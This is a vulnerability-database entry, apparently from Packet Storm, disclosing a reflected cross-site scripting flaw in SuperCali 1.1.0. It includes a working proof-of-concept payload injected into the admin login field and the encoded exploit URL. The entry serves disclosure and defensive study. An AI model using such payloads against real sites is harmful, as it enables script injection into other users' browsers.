Lucene search
TmrswrrPACKETSTORM:177254HistoryFeb 24, 2024 - 12:00 a.m.
SuperCali 1.1.0 Cross Site Scripting
2024-02-2400:00:00
tmrswrr
packetstormsecurity.com
124
exploit
cross site scripting
supercali
vulnerable version
admin login
payload
alert button
bad password page
url
confirm function
7.4 High
AI Score
Confidence
Low
`# Exploit Title: SuperCali Version : 1.1.0 - Reflected XSS
# Date: 2024-23-02
# Exploit Author: tmrswrr
# Vendor Homepage: https://supercali.inforest.com
# Version : 1.1.0
# Tested on: https://softaculous.com/demos/supercali
1 ) Go to admin login url : https://127.0.0.1/SuperCali/login.php
2 ) Write your payload admin place : "><img src=x onerrora=confirm() onerror=confirm(1)>
3 ) AFter click login will you see alert button : https://127.0.0.1/SuperCali/bad_password.php?email=\%22%3E%3Cimg%20src=x%20onerrora=confirm()%20onerror=confirm(1)%3E&return_to=127.0.0.1/&o=4&c=1&m=02&a=22&y=2024&w=1
`
7.4 High
AI Score
Confidence
Low